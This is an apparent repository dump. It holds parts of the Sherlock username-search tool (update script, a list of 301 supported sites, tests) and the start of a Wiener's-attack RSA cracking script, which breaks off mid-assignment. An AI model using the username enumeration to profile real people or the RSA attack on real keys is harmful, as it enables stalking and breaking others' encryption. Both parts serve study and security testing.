({data_length} Sites In Total!)\n') 44 | 45 | for social_network in data: 46 | url_main = data.get(social_network).get("urlMain") 47 | data.get(social_network)["rank"] = 0 48 | if args.rank: 49 | th = threading.Thread(target=get_rank, args=(url_main, data.get(social_network))) 50 | else: 51 | th = None 52 | pool.append((social_network, url_main, th)) 53 | if args.rank: 54 | th.start() 55 | 56 | index = 1 57 | for social_network, url_main, th in pool: 58 | if args.rank: 59 | th.join() 60 | site_file.write(f'{index}. [{social_network}]({url_main})\n') 61 | sys.stdout.write("\r{0}".format(f"Updated {index} out of {data_length} entries")) 62 | sys.stdout.flush() 63 | index = index + 1 64 | 65 | if args.rank: 66 | site_file.write(f'\nAlexa.com rank data fetched at ({datetime.utcnow()} UTC)\n') 67 | 68 | sorted_json_data = json.dumps(data, indent=2, sort_keys=True) 69 | 70 | with open("data.json", "w") as data_file: 71 | data_file.write(sorted_json_data) 72 | 73 | print("\nFinished updating supported site listing!") 74 | -------------------------------------------------------------------------------- /sherlock/sites.md: -------------------------------------------------------------------------------- 1 | ## List Of Supported Sites (301 Sites In Total!) 2 | 1. [2Dimensions](https://2Dimensions.com/) 3 | 2. [3dnews](http://forum.3dnews.ru/) 4 | 3. [4pda](https://4pda.ru/) 5 | 4. [500px](https://500px.com/) 6 | 5. [7Cups](https://www.7cups.com/) 7 | 6. [9GAG](https://9gag.com/) 8 | 7. [About.me](https://about.me/) 9 | 8. [Academia.edu](https://www.academia.edu/) 10 | 9. [AdobeForums](https://forums.adobe.com/) 11 | 10. [Alik.cz](https://www.alik.cz/) 12 | 11. [AllTrails](https://www.alltrails.com/) 13 | 12. [Anobii](https://www.anobii.com/) 14 | 13. [Aptoide](https://en.aptoide.com/) 15 | 14. [Archive.org](https://archive.org) 16 | 15. [Asciinema](https://asciinema.org) 17 | 16. [Ask Fedora](https://ask.fedoraproject.org/) 18 | 17. [AskFM](https://ask.fm/) 19 | 18. [Audiojungle](https://audiojungle.net/) 20 | 19. [Avizo](https://www.avizo.cz/) 21 | 20. [BLIP.fm](https://blip.fm/) 22 | 21. [Badoo](https://badoo.com/) 23 | 22. [Bandcamp](https://www.bandcamp.com/) 24 | 23. [Bazar.cz](https://www.bazar.cz/) 25 | 24. [Behance](https://www.behance.net/) 26 | 25. [BitBucket](https://bitbucket.org/) 27 | 26. [BitCoinForum](https://bitcoinforum.com) 28 | 27. [Blogger](https://www.blogger.com/) 29 | 28. [BodyBuilding](https://bodyspace.bodybuilding.com/) 30 | 29. [Bookcrossing](https://www.bookcrossing.com/) 31 | 30. [BuyMeACoffee](https://www.buymeacoffee.com/) 32 | 31. [BuzzFeed](https://buzzfeed.com/) 33 | 32. [CNET](https://www.cnet.com/) 34 | 33. [Carbonmade](https://carbonmade.com/) 35 | 34. [CashMe](https://cash.me/) 36 | 35. [Cent](https://cent.co/) 37 | 36. [Championat](https://www.championat.com/) 38 | 37. [Chatujme.cz](https://chatujme.cz/) 39 | 38. [Chess](https://www.chess.com/ru/) 40 | 39. [Cloob](https://www.cloob.com/) 41 | 40. [CloudflareCommunity](https://community.cloudflare.com/) 42 | 41. [Clozemaster](https://www.clozemaster.com) 43 | 42. [Codecademy](https://www.codecademy.com/) 44 | 43. [Codechef](https://www.codechef.com/) 45 | 44. [Coderwall](https://coderwall.com/) 46 | 45. [Codewars](https://www.codewars.com) 47 | 46. [ColourLovers](https://www.colourlovers.com/) 48 | 47. [Contently](https://contently.com/) 49 | 48. [Coroflot](https://coroflot.com/) 50 | 49. [Cracked](https://www.cracked.com/) 51 | 50. [CreativeMarket](https://creativemarket.com/) 52 | 51. [Crevado](https://crevado.com/) 53 | 52. [Crunchyroll](https://www.crunchyroll.com/) 54 | 53. [DEV Community](https://dev.to/) 55 | 54. [DailyMotion](https://www.dailymotion.com/) 56 | 55. [Designspiration](https://www.designspiration.net/) 57 | 56. [DeviantART](https://deviantart.com) 58 | 57. [Discogs](https://www.discogs.com/) 59 | 58. [Discuss.Elastic.co](https://discuss.elastic.co/) 60 | 59. [Disqus](https://disqus.com/) 61 | 60. [Docker Hub](https://hub.docker.com/) 62 | 61. [Dribbble](https://dribbble.com/) 63 | 62. [Duolingo](https://duolingo.com/) 64 | 63. [Ebay](https://www.ebay.com/) 65 | 64. [Ello](https://ello.co/) 66 | 65. [Etsy](https://www.etsy.com/) 67 | 66. [EyeEm](https://www.eyeem.com/) 68 | 67. [F3.cool](https://f3.cool/) 69 | 68. [Facebook](https://www.facebook.com/) 70 | 69. [Facenama](https://facenama.com/) 71 | 70. [Fandom](https://www.fandom.com/) 72 | 71. [Filmogs](https://www.filmo.gs/) 73 | 72. [Fiverr](https://www.fiverr.com/) 74 | 73. [Flickr](https://www.flickr.com/) 75 | 74. [Flightradar24](https://www.flightradar24.com/) 76 | 75. [Flipboard](https://flipboard.com/) 77 | 76. [Football](https://www.rusfootball.info/) 78 | 77. [FortniteTracker](https://fortnitetracker.com/challenges) 79 | 78. [Freesound](https://freesound.org/) 80 | 79. [GDProfiles](https://gdprofiles.com/) 81 | 80. [GPSies](https://www.gpsies.com/) 82 | 81. [Gamespot](https://www.gamespot.com/) 83 | 82. [Giphy](https://giphy.com/) 84 | 83. [GitHub](https://www.github.com/) 85 | 84. [GitLab](https://gitlab.com/) 86 | 85. [Gitee](https://gitee.com/) 87 | 86. [GoodReads](https://www.goodreads.com/) 88 | 87. [Gravatar](http://en.gravatar.com/) 89 | 88. [Gumroad](https://www.gumroad.com/) 90 | 89. [GunsAndAmmo](https://gunsandammo.com/) 91 | 90. [GuruShots](https://gurushots.com/) 92 | 91. [HackTheBox](https://forum.hackthebox.eu/) 93 | 92. [HackerNews](https://news.ycombinator.com/) 94 | 93. [HackerOne](https://hackerone.com/) 95 | 94. [HackerRank](https://hackerrank.com/) 96 | 95. [House-Mixes.com](https://www.house-mixes.com/) 97 | 96. [Houzz](https://houzz.com/) 98 | 97. [HubPages](https://hubpages.com/) 99 | 98. [Hubski](https://hubski.com/) 100 | 99. [IFTTT](https://www.ifttt.com/) 101 | 100. [ImageShack](https://imageshack.us/) 102 | 101. [ImgUp.cz](https://imgup.cz/) 103 | 102. [Instagram](https://www.instagram.com/) 104 | 103. [Instructables](https://www.instructables.com/) 105 | 104. [Investing.com](https://www.investing.com/) 106 | 105. [Issuu](https://issuu.com/) 107 | 106. [Itch.io](https://itch.io/) 108 | 107. [Jimdo](https://jimdosite.com/) 109 | 108. [Kaggle](https://www.kaggle.com/) 110 | 109. [KanoWorld](https://world.kano.me/) 111 | 110. [Keybase](https://keybase.io/) 112 | 111. [Kik](http://kik.me/) 113 | 112. [Kongregate](https://www.kongregate.com/) 114 | 113. [LOR](https://linux.org.ru/) 115 | 114. [Launchpad](https://launchpad.net/) 116 | 115. [LeetCode](https://leetcode.com/) 117 | 116. [Letterboxd](https://letterboxd.com/) 118 | 117. [Lichess](https://lichess.org) 119 | 118. [LiveJournal](https://www.livejournal.com/) 120 | 119. [LiveLeak](https://www.liveleak.com/) 121 | 120. [Lobsters](https://lobste.rs/) 122 | 121. [Medium](https://medium.com/) 123 | 122. [MeetMe](https://www.meetme.com/) 124 | 123. [Memrise](https://www.memrise.com/) 125 | 124. [MixCloud](https://www.mixcloud.com/) 126 | 125. [MyAnimeList](https://myanimelist.net/) 127 | 126. [Myspace](https://myspace.com/) 128 | 127. [NICommunityForum](https://www.native-instruments.com/forum/) 129 | 128. [NPM](https://www.npmjs.com/) 130 | 129. [NPM-Package](https://www.npmjs.com/) 131 | 130. [NameMC (Minecraft.net skins)](https://namemc.com/) 132 | 131. [NationStates Nation](https://nationstates.net) 133 | 132. [NationStates Region](https://nationstates.net) 134 | 133. [Newgrounds](https://newgrounds.com) 135 | 134. [OK](https://ok.ru/) 136 | 135. [OpenCollective](https://opencollective.com/) 137 | 136. [OpenStreetMap](https://www.openstreetmap.org/) 138 | 137. [Oracle Community](https://community.oracle.com) 139 | 138. [Otzovik](https://otzovik.com/) 140 | 139. [OurDJTalk](https://ourdjtalk.com/) 141 | 140. [PCPartPicker](https://pcpartpicker.com) 142 | 141. [PSNProfiles.com](https://psnprofiles.com/) 143 | 142. [Packagist](https://packagist.org/) 144 | 143. [Pastebin](https://pastebin.com/) 145 | 144. [Patreon](https://www.patreon.com/) 146 | 145. [Periscope](https://www.periscope.tv/) 147 | 146. [Photobucket](https://photobucket.com/) 148 | 147. [Pinkbike](https://www.pinkbike.com/) 149 | 148. [Pinterest](https://www.pinterest.com/) 150 | 149. [PlayStore](https://play.google.com/store) 151 | 150. [Pling](https://www.pling.com/) 152 | 151. [Plug.DJ](https://plug.dj/) 153 | 152. [Pokemon Showdown](https://pokemonshowdown.com) 154 | 153. [PokerStrategy](http://www.pokerstrategy.net) 155 | 154. [Polygon](https://www.polygon.com/) 156 | 155. [ProductHunt](https://www.producthunt.com/) 157 | 156. [PromoDJ](http://promodj.com/) 158 | 157. [Quora](https://www.quora.com/) 159 | 158. [Rajce.net](https://www.rajce.idnes.cz/) 160 | 159. [Rate Your Music](https://rateyourmusic.com/) 161 | 160. [Redbubble](https://www.redbubble.com/) 162 | 161. [Reddit](https://www.reddit.com/) 163 | 162. [Redsun.tf](https://redsun.tf/) 164 | 163. [Repl.it](https://repl.it/) 165 | 164. [ResearchGate](https://www.researchgate.net/) 166 | 165. [ReverbNation](https://www.reverbnation.com/) 167 | 166. [Roblox](https://www.roblox.com/) 168 | 167. [RubyGems](https://rubygems.org/) 169 | 168. [Sbazar.cz](https://www.sbazar.cz/) 170 | 169. [Scratch](https://scratch.mit.edu/) 171 | 170. [Scribd](https://www.scribd.com/) 172 | 171. [ShitpostBot5000](https://www.shitpostbot.com/) 173 | 172. [Signal](https://community.signalusers.org) 174 | 173. [Slack](https://slack.com) 175 | 174. [SlideShare](https://slideshare.net/) 176 | 175. [Smashcast](https://www.smashcast.tv/) 177 | 176. [Smule](https://www.smule.com/) 178 | 177. [SoundCloud](https://soundcloud.com/) 179 | 178. [SourceForge](https://sourceforge.net/) 180 | 179. [Speedrun.com](https://speedrun.com/) 181 | 180. [Splits.io](https://splits.io) 182 | 181. [Sporcle](https://www.sporcle.com/) 183 | 182. [SportsRU](https://www.sports.ru/) 184 | 183. [SportsTracker](https://www.sports-tracker.com/) 185 | 184. [Spotify](https://open.spotify.com/) 186 | 185. [Star Citizen](https://robertsspaceindustries.com/) 187 | 186. [Steam](https://steamcommunity.com/) 188 | 187. [SteamGroup](https://steamcommunity.com/) 189 | 188. [SublimeForum](https://forum.sublimetext.com/) 190 | 189. [T-MobileSupport](https://support.t-mobile.com) 191 | 190. [TamTam](https://tamtam.chat/) 192 | 191. [Taringa](https://taringa.net/) 193 | 192. [Telegram](https://t.me/) 194 | 193. [Tellonym.me](https://tellonym.me/) 195 | 194. [TikTok](https://www.tiktok.com/) 196 | 195. [Tinder](https://tinder.com/) 197 | 196. [TrackmaniaLadder](http://en.tm-ladder.com/index.php) 198 | 197. [TradingView](https://www.tradingview.com/) 199 | 198. [Trakt](https://www.trakt.tv/) 200 | 199. [TrashboxRU](https://trashbox.ru/) 201 | 200. [Trello](https://trello.com/) 202 | 201. [Trip](https://www.trip.skyscanner.com/) 203 | 202. [TripAdvisor](https://tripadvisor.com/) 204 | 203. [Twitch](https://www.twitch.tv/) 205 | 204. [Twitter](https://www.twitter.com/) 206 | 205. [Typeracer](https://typeracer.com) 207 | 206. [Ultimate-Guitar](https://ultimate-guitar.com/) 208 | 207. [Unsplash](https://unsplash.com/) 209 | 208. [VK](https://vk.com/) 210 | 209. [VSCO](https://vsco.co/) 211 | 210. [Velomania](https://forum.velomania.ru/) 212 | 211. [Venmo](https://venmo.com/) 213 | 212. [Viadeo](http://fr.viadeo.com/en/) 214 | 213. [Vimeo](https://vimeo.com/) 215 | 214. [Virgool](https://virgool.io/) 216 | 215. [VirusTotal](https://www.virustotal.com/) 217 | 216. [Wattpad](https://www.wattpad.com/) 218 | 217. [We Heart It](https://weheartit.com/) 219 | 218. [WebNode](https://www.webnode.cz/) 220 | 219. [Whonix Forum](https://forums.whonix.org/) 221 | 220. [Wikidot](http://www.wikidot.com/) 222 | 221. [Wikipedia](https://www.wikipedia.org/) 223 | 222. [Wix](https://wix.com/) 224 | 223. [WordPress](https://wordpress.com) 225 | 224. [WordPressOrg](https://wordpress.org/) 226 | 225. [YandexCollection](https://yandex.ru/collections/) 227 | 226. [YouNow](https://www.younow.com/) 228 | 227. [YouPic](https://youpic.com/) 229 | 228. [YouTube](https://www.youtube.com/) 230 | 229. [Zhihu](https://www.zhihu.com/) 231 | 230. [Zomato](https://www.zomato.com/) 232 | 231. [akniga](https://akniga.org/profile/blue/) 233 | 232. [allmylinks](https://allmylinks.com/) 234 | 233. [authorSTREAM](http://www.authorstream.com/) 235 | 234. [babyRU](https://www.baby.ru/) 236 | 235. [babyblogRU](https://www.babyblog.ru/) 237 | 236. [boingboing.net](https://boingboing.net/) 238 | 237. [chaos.social](https://chaos.social/) 239 | 238. [couchsurfing](https://www.couchsurfing.com/) 240 | 239. [d3RU](https://d3.ru/) 241 | 240. [dailykos](https://www.dailykos.com) 242 | 241. [datingRU](http://dating.ru) 243 | 242. [devRant](https://devrant.com/) 244 | 243. [tracr.co](https://tracr.co/) 245 | 244. [drive2](https://www.drive2.ru/) 246 | 245. [eGPU](https://egpu.io/) 247 | 246. [easyen](https://easyen.ru/) 248 | 247. [eintracht](https://eintracht.de) 249 | 248. [elwoRU](https://elwo.ru/) 250 | 249. [fixya](https://www.fixya.com) 251 | 250. [fl](https://www.fl.ru/) 252 | 251. [forum_guns](https://forum.guns.ru/) 253 | 252. [forumhouseRU](https://www.forumhouse.ru/) 254 | 253. [geocaching](https://www.geocaching.com/) 255 | 254. [gfycat](https://gfycat.com/) 256 | 255. [gpodder.net](https://gpodder.net/) 257 | 256. [habr](https://habr.com/) 258 | 257. [hackster](https://www.hackster.io) 259 | 258. [hunting](https://www.hunting.ru/forum/) 260 | 259. [iMGSRC.RU](https://imgsrc.ru/) 261 | 260. [igromania](http://forum.igromania.ru/) 262 | 261. [ingvarr.net.ru](http://ingvarr.net.ru/) 263 | 262. [interpals](https://www.interpals.net/) 264 | 263. [irecommend](https://irecommend.ru/) 265 | 264. [jeuxvideo](http://www.jeuxvideo.com) 266 | 265. [kwork](https://www.kwork.ru/) 267 | 266. [labpentestit](https://lab.pentestit.ru/) 268 | 267. [last.fm](https://last.fm/) 269 | 268. [leasehackr](https://forum.leasehackr.com/) 270 | 269. [livelib](https://www.livelib.ru/) 271 | 270. [mastodon.cloud](https://mastodon.cloud/) 272 | 271. [mastodon.social](https://chaos.social/) 273 | 272. [mastodon.technology](https://mastodon.xyz/) 274 | 273. [mastodon.xyz](https://mastodon.xyz/) 275 | 274. [metacritic](https://www.metacritic.com/) 276 | 275. [mixer.com](https://mixer.com/) 277 | 276. [moikrug](https://moikrug.ru/) 278 | 277. [mstdn.io](https://mstdn.io/) 279 | 278. [nnRU](https://https://www.nn.ru/) 280 | 279. [notabug.org](https://notabug.org/) 281 | 280. [note](https://note.com/) 282 | 281. [opennet](https://www.opennet.ru/) 283 | 282. [opensource](https://opensource.com/) 284 | 283. [osu!](https://osu.ppy.sh/) 285 | 284. [pedsovet](http://pedsovet.su/) 286 | 285. [phpRU](https://php.ru/forum/) 287 | 286. [pikabu](https://pikabu.ru/) 288 | 287. [pr0gramm](https://pr0gramm.com/) 289 | 288. [pvpru](https://pvpru.com/) 290 | 289. [radio_echo_msk](https://echo.msk.ru/) 291 | 290. [radioskot](https://radioskot.ru/) 292 | 291. [satsisRU](https://satsis.info/) 293 | 292. [segmentfault](https://segmentfault.com/) 294 | 293. [social.tchncs.de](https://social.tchncs.de/) 295 | 294. [sparkpeople](https://www.sparkpeople.com) 296 | 295. [spletnik](https://spletnik.ru/) 297 | 296. [svidbook](https://www.svidbook.ru/) 298 | 297. [toster](https://www.toster.ru/) 299 | 298. [travellerspoint](https://www.travellerspoint.com) 300 | 299. [uid](https://uid.me/) 301 | 300. [warriorforum](https://www.warriorforum.com/) 302 | 301. [windy](https://windy.com/) 303 | 304 | Alexa.com rank data fetched at (2020-02-24 03:51:43.731207 UTC) 305 | -------------------------------------------------------------------------------- /sherlock/tests/__init__.py: -------------------------------------------------------------------------------- 1 | """Sherlock Tests 2 | 3 | This package contains various submodules used to run tests. 4 | """ 5 | -------------------------------------------------------------------------------- /sherlock/tests/all.py: -------------------------------------------------------------------------------- 1 | """Sherlock Tests 2 | 3 | This module contains various tests. 4 | """ 5 | from tests.base import SherlockBaseTest 6 | import unittest 7 | 8 | 9 | class SherlockDetectTests(SherlockBaseTest): 10 | def test_detect_true_via_message(self): 11 | """Test Username Does Exist (Via Message). 12 | 13 | This test ensures that the "message" detection mechanism of 14 | ensuring that a Username does exist works properly. 15 | 16 | Keyword Arguments: 17 | self -- This object. 18 | 19 | Return Value: 20 | N/A. 21 | Will trigger an assert if detection mechanism did not work as expected. 22 | """ 23 | 24 | site = 'Instagram' 25 | site_data = self.site_data_all[site] 26 | 27 | #Ensure that the site's detection method has not changed. 28 | self.assertEqual("message", site_data["errorType"]) 29 | 30 | self.username_check([site_data["username_claimed"]], 31 | [site], 32 | exist_check=True 33 | ) 34 | 35 | return 36 | 37 | def test_detect_false_via_message(self): 38 | """Test Username Does Not Exist (Via Message). 39 | 40 | This test ensures that the "message" detection mechanism of 41 | ensuring that a Username does *not* exist works properly. 42 | 43 | Keyword Arguments: 44 | self -- This object. 45 | 46 | Return Value: 47 | N/A. 48 | Will trigger an assert if detection mechanism did not work as expected. 49 | """ 50 | 51 | site = 'Instagram' 52 | site_data = self.site_data_all[site] 53 | 54 | #Ensure that the site's detection method has not changed. 55 | self.assertEqual("message", site_data["errorType"]) 56 | 57 | self.username_check([site_data["username_unclaimed"]], 58 | [site], 59 | exist_check=False 60 | ) 61 | 62 | return 63 | 64 | def test_detect_true_via_status_code(self): 65 | """Test Username Does Exist (Via Status Code). 66 | 67 | This test ensures that the "status code" detection mechanism of 68 | ensuring that a Username does exist works properly. 69 | 70 | Keyword Arguments: 71 | self -- This object. 72 | 73 | Return Value: 74 | N/A. 75 | Will trigger an assert if detection mechanism did not work as expected. 76 | """ 77 | 78 | site = 'Facebook' 79 | site_data = self.site_data_all[site] 80 | 81 | #Ensure that the site's detection method has not changed. 82 | self.assertEqual("status_code", site_data["errorType"]) 83 | 84 | self.username_check([site_data["username_claimed"]], 85 | [site], 86 | exist_check=True 87 | ) 88 | 89 | return 90 | 91 | def test_detect_false_via_status_code(self): 92 | """Test Username Does Not Exist (Via Status Code). 93 | 94 | This test ensures that the "status code" detection mechanism of 95 | ensuring that a Username does *not* exist works properly. 96 | 97 | Keyword Arguments: 98 | self -- This object. 99 | 100 | Return Value: 101 | N/A. 102 | Will trigger an assert if detection mechanism did not work as expected. 103 | """ 104 | 105 | site = 'Facebook' 106 | site_data = self.site_data_all[site] 107 | 108 | #Ensure that the site's detection method has not changed. 109 | self.assertEqual("status_code", site_data["errorType"]) 110 | 111 | self.username_check([site_data["username_unclaimed"]], 112 | [site], 113 | exist_check=False 114 | ) 115 | 116 | return 117 | 118 | def test_detect_true_via_response_url(self): 119 | """Test Username Does Exist (Via Response URL). 120 | 121 | This test ensures that the "response URL" detection mechanism of 122 | ensuring that a Username does exist works properly. 123 | 124 | Keyword Arguments: 125 | self -- This object. 126 | 127 | Return Value: 128 | N/A. 129 | Will trigger an assert if detection mechanism did not work as expected. 130 | """ 131 | 132 | site = 'Quora' 133 | site_data = self.site_data_all[site] 134 | 135 | #Ensure that the site's detection method has not changed. 136 | self.assertEqual("response_url", site_data["errorType"]) 137 | 138 | self.username_check([site_data["username_claimed"]], 139 | [site], 140 | exist_check=True 141 | ) 142 | 143 | return 144 | 145 | def test_detect_false_via_response_url(self): 146 | """Test Username Does Not Exist (Via Response URL). 147 | 148 | This test ensures that the "response URL" detection mechanism of 149 | ensuring that a Username does *not* exist works properly. 150 | 151 | Keyword Arguments: 152 | self -- This object. 153 | 154 | Return Value: 155 | N/A. 156 | Will trigger an assert if detection mechanism did not work as expected. 157 | """ 158 | 159 | site = 'Quora' 160 | site_data = self.site_data_all[site] 161 | 162 | #Ensure that the site's detection method has not changed. 163 | self.assertEqual("response_url", site_data["errorType"]) 164 | 165 | self.username_check([site_data["username_unclaimed"]], 166 | [site], 167 | exist_check=False 168 | ) 169 | 170 | return 171 | 172 | 173 | class SherlockSiteCoverageTests(SherlockBaseTest): 174 | def test_coverage_false_via_response_url(self): 175 | """Test Username Does Not Exist Site Coverage (Via Response URL). 176 | 177 | This test checks all sites with the "response URL" detection mechanism 178 | to ensure that a Username that does not exist is reported that way. 179 | 180 | Keyword Arguments: 181 | self -- This object. 182 | 183 | Return Value: 184 | N/A. 185 | Will trigger an assert if detection mechanism did not work as expected. 186 | """ 187 | 188 | self.detect_type_check("response_url", exist_check=False) 189 | 190 | return 191 | 192 | def test_coverage_true_via_response_url(self): 193 | """Test Username Does Exist Site Coverage (Via Response URL). 194 | 195 | This test checks all sites with the "response URL" detection mechanism 196 | to ensure that a Username that does exist is reported that way. 197 | 198 | Keyword Arguments: 199 | self -- This object. 200 | 201 | Return Value: 202 | N/A. 203 | Will trigger an assert if detection mechanism did not work as expected. 204 | """ 205 | 206 | self.detect_type_check("response_url", exist_check=True) 207 | 208 | return 209 | 210 | def test_coverage_false_via_status(self): 211 | """Test Username Does Not Exist Site Coverage (Via HTTP Status). 212 | 213 | This test checks all sites with the "HTTP Status" detection mechanism 214 | to ensure that a Username that does not exist is reported that way. 215 | 216 | Keyword Arguments: 217 | self -- This object. 218 | 219 | Return Value: 220 | N/A. 221 | Will trigger an assert if detection mechanism did not work as expected. 222 | """ 223 | 224 | self.detect_type_check("status_code", exist_check=False) 225 | 226 | return 227 | 228 | def test_coverage_true_via_status(self): 229 | """Test Username Does Exist Site Coverage (Via HTTP Status). 230 | 231 | This test checks all sites with the "HTTP Status" detection mechanism 232 | to ensure that a Username that does exist is reported that way. 233 | 234 | Keyword Arguments: 235 | self -- This object. 236 | 237 | Return Value: 238 | N/A. 239 | Will trigger an assert if detection mechanism did not work as expected. 240 | """ 241 | 242 | self.detect_type_check("status_code", exist_check=True) 243 | 244 | return 245 | 246 | def test_coverage_false_via_message(self): 247 | """Test Username Does Not Exist Site Coverage (Via Error Message). 248 | 249 | This test checks all sites with the "Error Message" detection mechanism 250 | to ensure that a Username that does not exist is reported that way. 251 | 252 | Keyword Arguments: 253 | self -- This object. 254 | 255 | Return Value: 256 | N/A. 257 | Will trigger an assert if detection mechanism did not work as expected. 258 | """ 259 | 260 | self.detect_type_check("message", exist_check=False) 261 | 262 | return 263 | 264 | def test_coverage_true_via_message(self): 265 | """Test Username Does Exist Site Coverage (Via Error Message). 266 | 267 | This test checks all sites with the "Error Message" detection mechanism 268 | to ensure that a Username that does exist is reported that way. 269 | 270 | Keyword Arguments: 271 | self -- This object. 272 | 273 | Return Value: 274 | N/A. 275 | Will trigger an assert if detection mechanism did not work as expected. 276 | """ 277 | 278 | self.detect_type_check("message", exist_check=True) 279 | 280 | return 281 | 282 | def test_coverage_total(self): 283 | """Test Site Coverage Is Total. 284 | 285 | This test checks that all sites have test data available. 286 | 287 | Keyword Arguments: 288 | self -- This object. 289 | 290 | Return Value: 291 | N/A. 292 | Will trigger an assert if we do not have total coverage. 293 | """ 294 | 295 | self.coverage_total_check() 296 | 297 | return 298 | -------------------------------------------------------------------------------- /sherlock/tests/base.py: -------------------------------------------------------------------------------- 1 | """Sherlock Base Tests 2 | 3 | This module contains various utilities for running tests. 4 | """ 5 | import json 6 | import os 7 | import os.path 8 | import unittest 9 | import sherlock 10 | import warnings 11 | 12 | 13 | class SherlockBaseTest(unittest.TestCase): 14 | def setUp(self): 15 | """Sherlock Base Test Setup. 16 | 17 | Does common setup tasks for base Sherlock tests. 18 | 19 | Keyword Arguments: 20 | self -- This object. 21 | 22 | Return Value: 23 | N/A. 24 | """ 25 | 26 | #This ignores the ResourceWarning from an unclosed SSLSocket. 27 | #TODO: Figure out how to fix the code so this is not needed. 28 | warnings.simplefilter("ignore", ResourceWarning) 29 | 30 | # Load the data file with all site information. 31 | data_file_path = os.path.join(os.path.dirname(os.path.realpath(sherlock.__file__)), "data.json") 32 | with open(data_file_path, "r", encoding="utf-8") as raw: 33 | self.site_data_all = json.load(raw) 34 | 35 | # Load excluded sites list, if any 36 | excluded_sites_path = os.path.join(os.path.dirname(os.path.realpath(sherlock.__file__)), "tests/.excluded_sites") 37 | try: 38 | with open(excluded_sites_path, "r", encoding="utf-8") as excluded_sites_file: 39 | self.excluded_sites = excluded_sites_file.read().splitlines() 40 | except FileNotFoundError: 41 | self.excluded_sites = [] 42 | 43 | self.verbose=False 44 | self.tor=False 45 | self.unique_tor=False 46 | self.timeout=None 47 | 48 | return 49 | 50 | def site_data_filter(self, site_list): 51 | """Filter Site Data. 52 | 53 | Keyword Arguments: 54 | self -- This object. 55 | site_list -- List of strings corresponding to sites which 56 | should be filtered. 57 | 58 | Return Value: 59 | Dictionary containing sub-set of site data specified by 'site_list'. 60 | """ 61 | 62 | # Create new dictionary that has filtered site data based on input. 63 | # Note that any site specified which is not understood will generate 64 | # an error. 65 | site_data = {} 66 | for site in site_list: 67 | with self.subTest(f"Checking test vector Site '{site}' " 68 | f"exists in total site data." 69 | ): 70 | site_data[site] = self.site_data_all[site] 71 | 72 | return site_data 73 | 74 | def username_check(self, username_list, site_list, exist_check=True): 75 | """Username Exist Check. 76 | 77 | Keyword Arguments: 78 | self -- This object. 79 | username_list -- List of strings corresponding to usernames 80 | which should exist on *all* of the sites. 81 | site_list -- List of strings corresponding to sites which 82 | should be filtered. 83 | exist_check -- Boolean which indicates if this should be 84 | a check for Username existence, 85 | or non-existence. 86 | 87 | Return Value: 88 | N/A. 89 | Will trigger an assert if Username does not have the expected 90 | existence state. 91 | """ 92 | 93 | #Filter all site data down to just what is needed for this test. 94 | site_data = self.site_data_filter(site_list) 95 | 96 | if exist_check: 97 | check_type_text = "exists" 98 | exist_result_desired = "yes" 99 | else: 100 | check_type_text = "does not exist" 101 | exist_result_desired = "no" 102 | 103 | for username in username_list: 104 | results = sherlock.sherlock(username, 105 | site_data, 106 | verbose=self.verbose, 107 | tor=self.tor, 108 | unique_tor=self.unique_tor, 109 | timeout=self.timeout 110 | ) 111 | for site, result in results.items(): 112 | with self.subTest(f"Checking Username '{username}' " 113 | f"{check_type_text} on Site '{site}'" 114 | ): 115 | self.assertEqual(result['exists'], exist_result_desired) 116 | 117 | return 118 | 119 | def detect_type_check(self, detect_type, exist_check=True): 120 | """Username Exist Check. 121 | 122 | Keyword Arguments: 123 | self -- This object. 124 | detect_type -- String corresponding to detection algorithm 125 | which is desired to be tested. 126 | Note that only sites which have documented 127 | usernames which exist and do not exist 128 | will be tested. 129 | exist_check -- Boolean which indicates if this should be 130 | a check for Username existence, 131 | or non-existence. 132 | 133 | Return Value: 134 | N/A. 135 | Runs tests on all sites using the indicated detection algorithm 136 | and which also has test vectors specified. 137 | Will trigger an assert if Username does not have the expected 138 | existence state. 139 | """ 140 | 141 | #Dictionary of sites that should be tested for having a username. 142 | #This will allow us to test sites with a common username in parallel. 143 | sites_by_username = {} 144 | 145 | for site, site_data in self.site_data_all.items(): 146 | if ( 147 | (site in self.excluded_sites) or 148 | (site_data["errorType"] != detect_type) or 149 | (site_data.get("username_claimed") is None) or 150 | (site_data.get("username_unclaimed") is None) 151 | ): 152 | # This is either not a site we are interested in, or the 153 | # site does not contain the required information to do 154 | # the tests. 155 | pass 156 | else: 157 | # We should run a test on this site. 158 | 159 | # Figure out which type of user 160 | if exist_check: 161 | username = site_data.get("username_claimed") 162 | else: 163 | username = site_data.get("username_unclaimed") 164 | 165 | # Add this site to the list of sites corresponding to this 166 | # username. 167 | if username in sites_by_username: 168 | sites_by_username[username].append(site) 169 | else: 170 | sites_by_username[username] = [site] 171 | 172 | # Check on the username availability against all of the sites. 173 | for username, site_list in sites_by_username.items(): 174 | self.username_check([username], 175 | site_list, 176 | exist_check=exist_check 177 | ) 178 | 179 | return 180 | 181 | def coverage_total_check(self): 182 | """Total Coverage Check. 183 | 184 | Keyword Arguments: 185 | self -- This object. 186 | 187 | Return Value: 188 | N/A. 189 | Counts up all Sites with full test data available. 190 | Will trigger an assert if any Site does not have test coverage. 191 | """ 192 | 193 | site_no_tests_list = [] 194 | 195 | for site, site_data in self.site_data_all.items(): 196 | if ( 197 | (site_data.get("username_claimed") is None) or 198 | (site_data.get("username_unclaimed") is None) 199 | ): 200 | # Test information not available on this site. 201 | site_no_tests_list.append(site) 202 | 203 | self.assertEqual("", ", ".join(site_no_tests_list)) 204 | 205 | return 206 | -------------------------------------------------------------------------------- /weiner.py: -------------------------------------------------------------------------------- 1 | from Crypto.PublicKey import RSA 2 | from Crypto.Util.number import * 3 | from sympy import * 4 | import gmpy 5 | 6 | def cf_expansion(n,d): 7 | a = [] 8 | q = n//d 9 | r = n%d 10 | a.append(q) 11 | while r!=0: 12 | n,d = d,r 13 | q = n//d 14 | r = n%d 15 | a.append(q) 16 | return a 17 | 18 | def convergents(e): 19 | n = [] 20 | d = [] 21 | 22 | for i in range(len(e)): 23 | if i == 0: 24 | ni = e[i] 25 | di = 1 26 | elif i == 1: 27 | ni = e[i]*e[i-1] + 1 28 | di = e[i] 29 | else: 30 | ni = e[i]*n[i-1] + n[i-2] 31 | di = e[i]*d[i-1] + d[i-2] 32 | 33 | n.append(ni) 34 | d.append(di) 35 | yield (ni, di) 36 | 37 | 38 | e = 10313126904907659154044035721366030299232309115307337238069263116199564176949082532958372172524781222401197622749859873567807461466595706294618003558061807305009089579192976992088381679811566030775373564473171308640498756926134368136999882295511187054033765297409191882443609170411704473261992833838123818561 39 | n = 